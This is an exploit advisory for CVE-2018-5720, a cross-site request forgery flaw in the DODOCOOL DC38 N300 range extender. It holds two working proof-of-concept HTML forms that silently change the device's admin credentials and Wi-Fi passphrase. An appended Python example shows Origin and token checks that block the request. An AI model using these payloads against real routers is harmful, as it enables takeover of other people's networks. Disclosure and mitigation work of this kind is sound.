
# Exploit Title: DODOCOOL DC38 N300 Cross-site Request Forgery
# Date: 17-01-2018
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: DODOCOOL
# Vendor Homepage: www.dodocool.com
# Version: RTN2-AW.GD.R3465.1.20161103
# CVE: CVE-2018-5720

I DESCRIPTION
========================================================================

An issue was discovered in DODOCOOL DC38 3-in-1 N300 Mini Wireless Range
Extender RTN2-AW.GD.R3465.1.20161103 devices. A cross-site request forgery
(CSRF) vulnerability allows remote attackers to hijack the authentication
of users for requests that modify the configuration.

This vulnerability may lead to username and/or password changing, Wi-Fi
password changing, etc.

II PROOF OF CONCEPT
========================================================================

## Change user username and password (test_username:test_password):

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.10.1/boafrm/formPasswordSetup" method="POST">
      <input type="hidden" name="submit-url" value="/setok.htm?bw=main.htm" />
      <input type="hidden" name="submit-value" value="" />
      <input type="hidden" name="username" value="test_username" />
      <input type="hidden" name="newpass" value="test_password" />
      <input type="hidden" name="confpass" value="test_password" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

## Change WiFi Configuration (WIFI_TEST:TestTest):

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.10.1/boafrm/formWlanSetupREP" method="POST">
      <input type="hidden" name="submit-url" value="/setok.htm?bw=wl_rep.htm" />
      <input type="hidden" name="submit-value" value="repset" />
      <input type="hidden" name="wl_onoff" value="0" />
      <input type="hidden" name="wps_clear_configure_by_reg" value="0" />
      <input type="hidden" name="wlProfileId" value="" />
      <input type="hidden" name="wl_mode" value="0" />
      <input type="hidden" name="wl_authType" value="auto" />
      <input type="hidden" name="wepEnabled" value="ON" />
      <input type="hidden" name="weplength" value="" />
      <input type="hidden" name="wepformat" value="" />
      <input type="hidden" name="wl_wpaAuth" value="psk" />
      <input type="hidden" name="wl_pskFormat" value="0" />
      <input type="hidden" name="wl_pskValue" value="TestTest" />
      <input type="hidden" name="wl_ssid" value="WIFI_TEST" />
      <input type="hidden" name="wl_Method" value="6" />
      <input type="hidden" name="wep_key" value="" />
      <input type="hidden" name="ciphersuite" value="tkip+aes" />
      <input type="hidden" name="ciphersuite" value="aes" />
      <input type="hidden" name="wpa2ciphersuite" value="tkip+aes" />
      <input type="hidden" name="wpa2ciphersuite" value="aes" />
      <input type="hidden" name="web_pskValue" value="TestTest" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
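
The mitigation side of the PoCs above, as an added example that is not part of the advisory and not the vendor's firmware code: a server-side check that a form handler such as formPasswordSetup or formWlanSetupREP could apply before accepting a configuration change. It assumes the admin UI is served only from http://192.168.10.1 over plain HTTP and that the device's forms could be extended with a hidden session-bound field (hypothetical name csrf_token); the request headers, form bodies and session values are constructed for the example. Run over the request the first PoC page generates, it rejects it on the Origin check even though the page's history.pushState('', '', '/') has masked the referring path, and it also rejects a same-origin submission that lacks the token.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Origins the device's own admin UI is served from. The PoC forms above target
# http://192.168.10.1, so that is the only trusted origin here (assumption:
# plain HTTP on the LAN address, no alternate hostname).
TRUSTED_ORIGINS = {"http://192.168.10.1"}
STATE_CHANGING_METHODS = {"POST", "PUT", "PATCH", "DELETE"}
# Hypothetical hidden form field that would carry the per-session token.
TOKEN_FIELD = "csrf_token"


def origin_of(url):
    """Reduce a URL to its scheme://host[:port] origin, or None if malformed."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def issue_token(session):
    """Mint a fresh anti-CSRF token and bind it to the session."""
    token = secrets.token_urlsafe(32)
    session[TOKEN_FIELD] = token
    return token


def check_request(method, headers, form, session):
    """Decide whether a form submission may change device configuration.

    Returns (allowed, reason). Both checks must pass: the browser-supplied
    Origin (or, failing that, Referer) must be a trusted origin, and the
    form must carry the token bound to this session.
    """
    if method.upper() not in STATE_CHANGING_METHODS:
        return True, "safe method, no state change"

    h = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    origin = h.get("origin")
    if origin is None and "referer" in h:
        origin = origin_of(h["referer"])
    if origin is None:
        return False, "missing Origin and Referer on state-changing request"  # fail closed
    if origin.lower() not in TRUSTED_ORIGINS:
        # The PoC's history.pushState('', '', '/') rewrites only the *path* of
        # the attacker page, so its Referer becomes "http://<attacker>/"; the
        # scheme and host, and therefore the Origin, are unchanged.
        return False, f"cross-site origin {origin}"

    expected = session.get(TOKEN_FIELD)
    supplied = form.get(TOKEN_FIELD)
    if not expected or not supplied:
        return False, "anti-CSRF token missing"
    if not hmac.compare_digest(expected, supplied):
        return False, "anti-CSRF token mismatch"
    return True, "ok"


# --- constructed sample traffic (not captured from a real device) -----------

# What the first PoC page produces when a logged-in user visits it: the browser
# attaches the session cookie, but Origin/Referer name the attacker's page and
# the body carries no session-bound token.
CROSS_SITE_HEADERS = {
    "Origin": "http://attacker.example",
    "Referer": "http://attacker.example/",  # path rewritten by pushState
    "Cookie": "session=abc123",
}
PASSWORD_FORM = {
    "submit-url": "/setok.htm?bw=main.htm",
    "submit-value": "",
    "username": "test_username",
    "newpass": "test_password",
    "confpass": "test_password",
}
# The same change submitted from the device's own UI (page path illustrative).
SAME_ORIGIN_HEADERS = {
    "Origin": "http://192.168.10.1",
    "Referer": "http://192.168.10.1/password.htm",
    "Cookie": "session=abc123",
}


def demo():
    """Run the checks over the samples; returns {name: (allowed, reason)}."""
    session = {}
    token = issue_token(session)
    legit_form = dict(PASSWORD_FORM, **{TOKEN_FIELD: token})
    return {
        "cross_site": check_request("POST", CROSS_SITE_HEADERS, PASSWORD_FORM, session),
        "same_origin_no_token": check_request("POST", SAME_ORIGIN_HEADERS, PASSWORD_FORM, session),
        "same_origin_with_token": check_request("POST", SAME_ORIGIN_HEADERS, legit_form, session),
        "read_only": check_request("GET", CROSS_SITE_HEADERS, {}, session),
    }


if __name__ == "__main__":
    for name, (allowed, reason) in demo().items():
        print(f"{name:24s} {'ALLOW' if allowed else 'REJECT':7s} {reason}")
```

Running the file prints one ALLOW/REJECT line per sample. The origin check alone is only as good as the list of trusted origins (a device reachable under a second hostname would need that origin added), which is why the session-bound token is the check that carries the weight; marking the session cookie SameSite=Lax adds a further layer in browsers that honour it.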